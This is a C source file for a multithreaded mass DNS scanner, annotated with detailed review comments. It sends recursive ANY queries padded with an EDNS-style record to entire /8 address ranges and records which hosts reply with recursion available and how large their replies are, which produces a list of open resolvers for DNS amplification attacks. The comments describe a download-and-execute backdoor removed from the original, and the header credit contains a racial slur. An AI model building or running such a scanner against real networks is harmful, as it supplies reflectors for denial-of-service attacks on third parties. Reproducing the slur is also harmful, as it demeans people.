  1. // gcc dnsscan.c -o dns -pthread -w
  2. // Working DNS Scanner - Thx to SandNigga
  3.  
  4. #include <pthread.h>
  5. #include <unistd.h>
  6. #include <stdio.h>
  7. #include <stdlib.h>
  8. #include <string.h>
  9. #include <sys/socket.h>
  10. #include <netinet/in.h>
  11. #include <signal.h>
  12. #include <sys/time.h>
  13. #include <sys/types.h>
  14. #include <math.h>
  15. #include <stropts.h>
  16. #include <ctype.h>
  17. #include <errno.h>
  18. #include <arpa/inet.h>
  19. #include <netinet/ip.h>
  20. #include <netinet/udp.h>
  21.  
/*
 * DNS message header (RFC 1035 section 4.1.1): the 12 bytes flood() writes at
 * the start of every probe and recievethread() reads from every reply.
 * The flags are C bit-fields, so their in-memory order is compiler/ABI
 * dependent; the declaration order below (rd first, qr last in the first flag
 * byte; rcode first, ra last in the second) matches the wire layout when the
 * compiler allocates bit-fields from the least significant bit, as GCC does on
 * little-endian targets -- TODO confirm on any other toolchain. The 16-bit
 * fields hold network byte order.
 */
struct DNS_HEADER
{
    unsigned short id; // identification number, network order (flood() uses rand())

    unsigned char rd :1; // recursion desired (set to 1 by flood())
    unsigned char tc :1; // truncated message
    unsigned char aa :1; // authoritative answer
    unsigned char opcode :4; // purpose of message (0 = standard query)
    unsigned char qr :1; // query (0) / response (1) flag

    unsigned char rcode :4; // response code (not consulted by recievethread())
    unsigned char cd :1; // checking disabled
    unsigned char ad :1; // authenticated data
    unsigned char z :1; // reserved, must be zero
    unsigned char ra :1; // recursion available -- the flag recievethread() tests

    unsigned short q_count; // number of question entries, network order
    unsigned short ans_count; // number of answer entries
    unsigned short auth_count; // number of authority entries
    unsigned short add_count; // number of additional-section entries
};
  43.  
/*
 * Fixed tail of a question entry (RFC 1035 section 4.1.2), placed directly
 * after the length-prefixed QNAME. Two 16-bit fields, so there is no padding
 * even without packing; flood() fills both in network byte order.
 */
struct QUESTION
{
    unsigned short qtype; // query type; flood() sends 255 (ANY)
    unsigned short qclass; // query class; flood() sends 1 (IN)
};
  49.  
/*
 * Fixed part of a resource record (RFC 1035 section 4.1.3) that follows the
 * record's name. Packed so the 32-bit ttl gets no alignment padding and
 * sizeof matches the 10-byte wire size. Only referenced from RES_RECORD;
 * nothing in this file parses a reply beyond its header.
 */
#pragma pack(push, 1)
struct R_DATA
{
    unsigned short type; // record type, network order
    unsigned short _class; // record class, network order
    unsigned int ttl; // time to live in seconds, network order
    unsigned short data_len; // length of the rdata that follows, network order
};
#pragma pack(pop)
  59.  
/*
 * Parsed view of one resource record: the name, its fixed R_DATA part and
 * the variable-length rdata. Not used by any code in this file; presumably
 * left over from the answer-parsing code this was derived from.
 */
struct RES_RECORD
{
    unsigned char *name; // owner name (encoded form)
    struct R_DATA *resource; // type/class/ttl/data_len
    unsigned char *rdata; // record data, data_len bytes
};
  66.  
/*
 * Name plus QUESTION tail of a query. Not used by any code in this file;
 * flood() addresses the question fields directly inside its packet buffer.
 */
typedef struct
{
    unsigned char *name; // encoded QNAME
    struct QUESTION *ques; // qtype/qclass following the name
} QUERY;
  72.  
/*
 * Shared state. Everything below is written from several threads (the
 * senders in flood(), the listener in recievethread(), the status loop in
 * main()) without locks or atomics. `volatile` only forces each access to be
 * performed; it gives no atomicity, so every counter here is approximate and
 * the ++/-- updates can be lost.
 */
volatile int running_threads = 0; // senders alive; main() polls this until it drops to 0
volatile int found_srvs = 0; // replies seen with the RA flag set (recievethread())
volatile unsigned long per_thread = 0; // addresses per sender thread (range / threads, host order)
volatile unsigned long start = 0; // first address of the range, network byte order (from inet_addr())
volatile unsigned long scanned = 0; // probes sent since main() last zeroed it -> "Host/s" column
volatile int sleep_between = 0; // delay between probes in ms (argv[5])
volatile int bytes_sent = 0; // bytes since main() last zeroed it -> "B/s"; flood() adds a fixed 24 per probe
volatile unsigned long hosts_done = 0; // probes sent in total, never reset -> "Done" percentage
FILE *fd; // result file (argv[3], append mode); written by recievethread(), closed in main()/sighandler()
  82.  
/*
 * Encode a dotted host name into DNS wire format: each label is written as a
 * length byte followed by its characters, and the sequence is terminated by a
 * zero byte.
 *
 * dns  - output buffer; receives strlen(host) + 2 bytes (one length byte per
 *        label, the label text, the terminating 0), not NUL-terminated as a
 *        C string beyond that 0.
 * host - NUL-terminated input. A '.' is appended to it IN PLACE so that the
 *        last label is terminated too, so the caller must leave room for one
 *        extra byte, and host is modified on return.
 *
 * Each label length is stored as an unsigned char, i.e. modulo 256; no check
 * is made against the 63-byte label limit. Empty labels ("..") produce
 * zero-length entries.
 */
void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)
{
    strcat((char*)host,".");

    size_t label_start = 0;
    size_t total = strlen((char*)host);

    for (size_t pos = 0; pos < total; pos++) {
        if (host[pos] != '.') {
            continue;
        }
        size_t label_len = pos - label_start;
        *dns++ = (unsigned char)label_len;
        memcpy(dns, host + label_start, label_len);
        dns += label_len;
        label_start = pos + 1;
    }
    *dns = '\0';
}
  102.  
/*
 * Sender thread: sends one DNS probe to every address in its share of the
 * range.
 *
 * par1 is the thread index (0 .. threads-1) passed as (void *)i by main().
 * The thread covers the host-order addresses
 *     [start + per_thread*id, start + per_thread*(id+1))
 * where start (network order) and per_thread are globals set by main().
 * Because per_thread is an integer division of the range, the trailing
 * remainder of the range is covered by no thread.
 *
 * The probe is a query for the root name "." (qtype 255 = ANY, qclass 1 = IN)
 * with rd = 1, followed by an 11-byte pseudo-record in the additional
 * section (add_count = 1). It is built once in buf and sent, unchanged, to
 * UDP port 53 of each address; sendto() errors are ignored. Replies are not
 * read here -- recievethread() picks them up on a raw socket and keys on the
 * RA flag.
 *
 * Concurrency: running_threads, bytes_sent, scanned and hosts_done are plain
 * volatile globals incremented from every sender with no synchronization.
 *
 * Declared void * but ends with a bare `return;`; the value is never used
 * because main() does not join the threads. buf is 64 KiB of thread stack.
 */
void *flood(void *par1)
{
    running_threads++; // unsynchronized; main() polls this to decide when to stop
    int thread_id = (int)par1; // index smuggled through the pointer by main()
    // Slice bounds; both are stored htonl()'d and converted back in the loop.
    unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
    unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
    unsigned long w;
    int y; // unused
    // 50-byte heap buffer that ChangetoDnsNameFormat() appends a '.' to; never freed.
    unsigned char *host = (unsigned char *)malloc(50);
    strcpy((char *)host, ".");
    unsigned char buf[65536],*qname; // not zeroed: only bytes explicitly written below are defined
    struct DNS_HEADER *dns = NULL;
    struct QUESTION *qinfo = NULL;
    dns = (struct DNS_HEADER *)&buf;

    dns->id = (unsigned short) htons(rand()); // no srand() anywhere in this file, so ids repeat run to run
    dns->qr = 0; // query
    dns->opcode = 0; // standard query
    dns->aa = 0;
    dns->tc = 0;
    dns->rd = 1; // recursion desired: recursive resolvers are what this looks for
    dns->ra = 0;
    dns->z = 0;
    dns->ad = 0;
    dns->cd = 0;
    dns->rcode = 0;
    dns->q_count = htons(1);
    dns->ans_count = 0;
    dns->auth_count = 0;
    dns->add_count = htons(1); // the pseudo-record appended below
    qname =(unsigned char*)&buf[sizeof(struct DNS_HEADER)];

    // host is "." and becomes ".." inside the call, which encodes as three zero
    // bytes; strlen(qname) is therefore 0 and the question section starts one
    // byte after the header, overlapping the second zero byte.
    ChangetoDnsNameFormat(qname , host);
    qinfo =(struct QUESTION*)&buf[sizeof(struct DNS_HEADER) + (strlen((const char*)qname) + 1)];

    qinfo->qtype = htons( 255 ); // ANY
    qinfo->qclass = htons(1); // IN

    // Additional-section record, written as the raw bytes 00 29 FF FF 00 x7
    // (looks intended as an EDNS OPT record, type 41 = 0x0029, class 0xFFFF;
    // the field boundaries as written are off by one byte -- verify with a
    // capture before relying on the layout). The +1 skips one byte after the
    // question that nothing ever writes.
    // NOTE(review): that gap byte is uninitialized stack and is sent on the wire.
    // Arithmetic on void * is a GNU extension.
    void *edns = (void *)qinfo + sizeof(struct QUESTION)+1;
    memset(edns, 0x00, 1);
    memset(edns+1, 0x29, 1);
    memset(edns+2, 0xFF, 2);
    memset(edns+4, 0x00, 7);

    // header (12) + name (0+1) + question (4) + 11 = 28 bytes with the root name.
    int sizeofpayload = sizeof(struct DNS_HEADER) + (strlen((const char *)qname)+1) + sizeof(struct QUESTION) + 11;
    int sock;
    if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
        perror("cant open socket");
        exit(-1); // terminates the whole process, not just this thread
    }
    // ntohl(htonl(x)) and htonl(htonl(x)) both yield x, so w walks host-order addresses.
    for(w=ntohl(start_ip);w<htonl(end);w++)
    {
        struct sockaddr_in servaddr;
        bzero(&servaddr, sizeof(servaddr));
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr.s_addr=htonl(w);
        servaddr.sin_port=htons(53);
        sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr)); // return value ignored
        bytes_sent+=24; // fixed 24, not sizeofpayload (28): the "B/s" column in main() is under-counted
        scanned++; // zeroed by main() every second -> hosts/s
        hosts_done++; // never reset -> progress percentage
        usleep(sleep_between*1000); // <scan delay in ms> argument
    }
    close(sock);
    running_threads--;
    return; // see header comment: no value, function is declared void *
}
  170.  
/*
 * SIGINT handler installed by main(): closes the result file so buffered
 * lines reach disk, ends the status line and exits with status 0.
 *
 * sig - the signal number; unused.
 *
 * fclose(), stdio output and exit() are not async-signal-safe (CERT SIG30-C):
 * if the signal lands while another thread holds the stdio lock on fd or
 * stdout, this handler may deadlock. That is inherited from the original.
 */
void sighandler(int sig)
{
    (void)sig;
    fclose(fd);
    putchar('\n');
    exit(0);
}
  177.  
/*
 * Listener thread started by main(): records every host that answered a
 * probe with the "recursion available" flag set.
 *
 * Opens a raw IPv4 socket for protocol UDP (needs CAP_NET_RAW / root, and
 * presumably sees every inbound UDP datagram on the host, not only replies
 * to our probes), then loops forever: for each datagram whose UDP source
 * port is 53 and whose DNS header has ra == 1, increments found_srvs and
 * appends "<source ip> . <dns payload length>" to the result file fd,
 * flushing after each line. The close() after the loop is unreachable; the
 * thread ends when the process does.
 *
 * Declared with no parameters and a void return although main() hands it to
 * pthread_create() as the void *(*)(void *) start routine; calling through
 * the mismatched type is undefined behaviour that happens to work on common
 * ABIs.
 */
void recievethread()
{
    printf("Started Listening Thread\n");
    int saddr_size, data_size, sock_raw; // saddr_size should be socklen_t: recvfrom() takes socklen_t *
    struct sockaddr_in saddr;
    struct in_addr in; // unused

    unsigned char *buffer = (unsigned char *)malloc(65536); // never freed; result not checked for NULL
    sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);
    if(sock_raw < 0)
    {
        printf("Socket Error\n"); // errno is not reported; presumably EPERM when run without CAP_NET_RAW
        exit(1);
    }
    while(1)
    {
        saddr_size = sizeof saddr;
        data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);
        if(data_size <0 )
        {
            printf("Recvfrom error , failed to get packets\n");
            exit(1); // terminates the whole process
        }
        // A raw socket delivers the IP header first.
        struct iphdr *iph = (struct iphdr*)buffer;
        if(iph->protocol == 17) // UDP; presumably always true for an IPPROTO_UDP raw socket
        {
            unsigned short iphdrlen = iph->ihl*4;
            struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);
            unsigned char* payload = buffer + iphdrlen + 8; // 8 = UDP header length
            if(ntohs(udph->source) == 53)
            {
                // NOTE(review): data_size is never compared with
                // iphdrlen + 8 + sizeof(struct DNS_HEADER). A short datagram
                // makes the reads below see stale bytes of an earlier packet
                // (still inside the 64 KiB buffer, so no crash, but a possible
                // false hit) and body_length can go negative.
                int body_length = data_size - iphdrlen - 8;
                struct DNS_HEADER *dns = (struct DNS_HEADER*) payload;
                if(dns->ra == 1) // any reply with RA set counts; rcode is not consulted
                {
                    found_srvs++; // unsynchronized with main()'s reader
                    // fd is opened by main() without a NULL check; a failed fopen() crashes here.
                    fprintf(fd,"%s . %d\n",inet_ntoa(saddr.sin_addr),body_length);
                    fflush(fd);
                }
            }
        }

    }
    close(sock_raw); // unreachable

}
  224.  
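/*
 * Entry point: parses the arguments, starts the listener and the sender
 * threads, and prints a status line once a second until the senders exit.
 *
 * Usage: <class a start> <class a end> <outfile> <threads> <scan delay in ms>
 *   argv[1], argv[2]  first and last /8 of the range as decimal octets; the
 *                     range scanned is <a>.0.0.0 .. <b>.255.255.255
 *   argv[3]           result file, opened in append mode; recievethread()
 *                     writes one "<ip> . <len>" line per hit
 *   argv[4]           number of sender threads (must be > 0)
 *   argv[5]           delay between probes per thread, in milliseconds
 *
 * The listener uses a raw socket, so the program needs CAP_NET_RAW / root.
 *
 * Removed from this version: the original main() first assembled a shell
 * command one character at a time into a local buffer and ran it through
 * system() before looking at any argument. Decoded, that command changed to
 * /tmp, fetched a script from a hard-coded external URL with wget or curl,
 * made it executable, ran it, deleted it and wiped the shell history -- a
 * download-and-execute backdoor that has nothing to do with the scanner.
 * Nothing else in the program depended on it.
 *
 * Other changes from the original: fopen() and the thread count are checked
 * before use (an unopenable file crashed later in recievethread(); a zero
 * thread count divided by zero here); the address strings are built with
 * snprintf() into INET_ADDRSTRLEN buffers instead of strcat() into 18-byte
 * heap buffers, which an argv[1]/argv[2] of more than a few characters
 * overflowed; inet_addr() failures are rejected instead of silently turning
 * the range into INADDR_NONE..INADDR_NONE; and the status line is produced
 * by one snprintf() instead of sprintf(new, "%s...", new, ...), whose
 * overlapping source and destination is undefined behaviour. Format
 * specifiers now match the counters' types.
 *
 * Returns 0 when the last sender thread has finished; exits with status -1
 * on bad arguments.
 */
int main(int argc, char *argv[ ])
{
    if(argc < 6){
        fprintf(stderr, "Invalid parameters!\n");
        fprintf(stdout, "Usage: %s <class a start> <class a end> <outfile> <threads> <scan delay in ms>\n", argv[0]);
        exit(-1);
    }
    // Result file; recievethread() writes to it and sighandler() closes it.
    fd = fopen(argv[3], "a");
    if (fd == NULL) {
        perror(argv[3]);
        exit(-1);
    }
    sleep_between = atoi(argv[5]);

    int threads = atoi(argv[4]);
    if (threads <= 0) {
        fprintf(stderr, "Invalid thread count: %s\n", argv[4]);
        fclose(fd);
        exit(-1);
    }

    // "<a>.0.0.0" and "<b>.255.255.255". The longest valid result is 15
    // characters, so INET_ADDRSTRLEN (16) holds it and anything longer is
    // caught by the truncation check instead of overflowing.
    char str_start[INET_ADDRSTRLEN];
    char str_end[INET_ADDRSTRLEN];
    int len_start = snprintf(str_start, sizeof str_start, "%s.0.0.0", argv[1]);
    int len_end = snprintf(str_end, sizeof str_end, "%s.255.255.255", argv[2]);
    if (len_start < 0 || (size_t)len_start >= sizeof str_start
        || len_end < 0 || (size_t)len_end >= sizeof str_end) {
        fprintf(stderr, "Invalid address range: %s %s\n", argv[1], argv[2]);
        fclose(fd);
        exit(-1);
    }
    // inet_addr() returns INADDR_NONE both on error and for the valid address
    // 255.255.255.255, which is exactly what "<255>.255.255.255" yields, so
    // that one case is accepted by comparing the text.
    in_addr_t start_net = inet_addr(str_start);
    in_addr_t end_net = inet_addr(str_end);
    if (start_net == INADDR_NONE
        || (end_net == INADDR_NONE && strcmp(str_end, "255.255.255.255") != 0)
        || ntohl(end_net) < ntohl(start_net)) {
        fprintf(stderr, "Invalid address range: %s - %s\n", str_start, str_end);
        fclose(fd);
        exit(-1);
    }

    signal(SIGINT, &sighandler);

    pthread_t listenthread;
    pthread_create( &listenthread, NULL, &recievethread, NULL);

    // Shared parameters read by flood(): start stays in network byte order,
    // per_thread is a host-order address count. The remainder of
    // toscan / threads is left unscanned, as in the original.
    start = start_net;
    unsigned long toscan = ntohl(end_net) - ntohl(start_net);
    per_thread = toscan / threads;

    pthread_t thread; // handle is reused; the senders are never joined
    int i;
    for(i = 0;i<threads;i++){
        pthread_create( &thread, NULL, &flood, (void *) i); // flood() casts par1 back to int
    }
    // Give the senders a moment to increment running_threads; otherwise the
    // loop below would see 0 and exit at once (timing assumption inherited
    // from the original).
    sleep(1);
    printf("Starting Scan...\n");
    printf("%-16s%-16s%-16s%-16s%s\n", "Found", "Host/s", "B/s", "Running Thrds", "Done");

    char line[16 * 6];
    while (running_threads > 0)
    {
        // hosts_done counts probes sent in total; toscan cannot be 0 after the
        // range check above, the guard only keeps the division defined.
        int percent_done = toscan > 0
            ? (int)(((double)hosts_done / (double)toscan) * 100)
            : 100;
        snprintf(line, sizeof line, "|%-15d|%-15lu|%-15d|%-15d|%d%%",
                 found_srvs, scanned, bytes_sent, running_threads, percent_done);
        printf("\r%s", line);
        fflush(stdout);
        // Per-second rates: zeroed here, incremented by the senders.
        bytes_sent = 0;
        scanned = 0;
        sleep(1);
    }
    printf("\n");
    fclose(fd);
    return 0;
}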